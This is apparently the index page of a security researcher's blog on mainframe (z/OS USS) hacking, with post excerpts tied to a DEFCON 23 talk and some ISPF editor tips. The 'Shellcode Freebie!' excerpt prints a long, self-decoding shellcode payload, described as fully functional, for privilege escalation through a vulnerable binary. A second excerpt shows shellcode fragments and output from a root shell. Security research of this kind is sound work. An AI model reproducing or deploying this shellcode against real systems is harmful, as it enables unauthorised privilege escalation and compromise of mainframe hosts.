Shellcode Freebie!

Got a burning privesc vulnerable binary on your  USS? How about feeding it a little self-decoding shellcode?  (Hint this is fully functional, find a C stub and try it yourself!). “\x90\xec\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22” “\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12” “\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef” “\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4” “\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x17\x22\x17\x33\x1a\xb1” “\x1b\xb4\x50\xd0\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34” “\x1a\x34\x1a\x34\x1a\x34\x18\x53\x1b\x31\x18\x41\x17\x11\x17\x22” “\x97\x02\x30\x01\x1a\x14\xb9\xf8\x10\x23\x97\x02\x20\x01\xa7\x1e” “\x01\x70\xa7\x44\xff\xf9\x17\x44\x58\xd4\xb0\x04\x0d\xe5\xde\xad” “\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\x92\xe9” “\xd2\x0e\xc2\xf2\xfd\xfd\xfd\xfc\x5a\x02\xf2\x2a\x5a\xf2\xf2\x2e” “\x5a\xe2\x02\x12\x5a\xec\x01\x06\x5a\xec\x02\xa2\xb0\x1a\xe2\x02” “\xa5\xf6\x02\x05\x02\x02\x02\x12\x02\xda\x02\x02\x02\x04\x1a\xff” “\x1a\xd3\x52\xf2\xd2\x06\x52\xd2\xf2\x0a\x5a\x12\xf2\x1a\x43\xa2” “\x02\xda\x1c\xaf\x52\xa2\xd2\x4a\xc2\x32\x02\x02\x02\x75\xe9\xe9” “\xd2\x96\x02\x24\xc2\xb2\x02\x02\x02\x77\x43\x22\x02\x02\x52\x22” “\xd2\x82\x43\xe2\x02\x05\x52\xe2\xd2\x86\x43\xe2\xd2\x82\x52\xe2” “\xd2\x8a\x1a\xe0\x52\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\x12\x5a\xe2” “\xd2\x92\xd0\x01\xd2\x92\xe0\x22\x5a\xe2\xd2\x92\xd0\x01\xd2\x92” “\xe2\x1a\x5a\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\xe6\x5a\xe2\xd2\x8a” “\x1d\x02\x41\x02\xe2\x02\x5a\xf2\xd2\x92\x43\xe2\xd2\x82\x43\x42” “\xd2\x86\x43\x12\xd2\x4e\x52\x42\xd2\x4e\x1a\x49\x52\x42\xd2\x52” “\x52\xe2\xd2\x56\x52\x02\xd2\x5a\x52\x02\xd2\x5e\x52\xe2\xd2\x62” “\x52\x02\xd2\x66\x52\x02\xd2\x6a\x52\xe2\xd2\x6e\x52\x02\xd2\x72” “\x52\xe2\xd2\x76\x52\xe2\xd2\x7a\x52\xe2\xd2\x7e\xd0\x01\xd2\x0a”… Continue reading Shellcode Freebie!

Tips / Tricks – 7/2/15 (update)

Updated.  Added update to the packet capture section below, included pcap export! ISPF editor Want more real estate in your ISPF editor?   In an editing session enter EDSET in the command line, then check the line marked:   X Remove action bars in ISPF edit and view panels This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)

Mainframe shellcode

Come see my talk at DEFCON23. … SLR   14,14 MVC   32(4,13),16(14) L     14,32(,13) … \x1f\xee \xd2\x03\xd0\x20\xe0\x10 \x58\xe0\xd0\x20 … # id uid=0(IBMUSER) gid=0(SYS1) … Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!

Adventures in securing a “dinosaur”

This blog is my own chronicle of adventures in writing exploits, cryptography, security and who knows what else.   Specifically though, I’m going to start by sharing technical specifics to support my upcoming co-talk at Defcon 23. Our talk titled “Security Necromancy: Further Adventures in Mainframe Hacking” seeks to educate the security community to actively dig… Continue reading Adventures in securing a “dinosaur”

Opinions expressed are solely my own and do not express the views or opinions of my employer, or likely anyone else in the world, aside from myself.

Comments are moderated solely for relevance and to prevent spam.

How to contact me.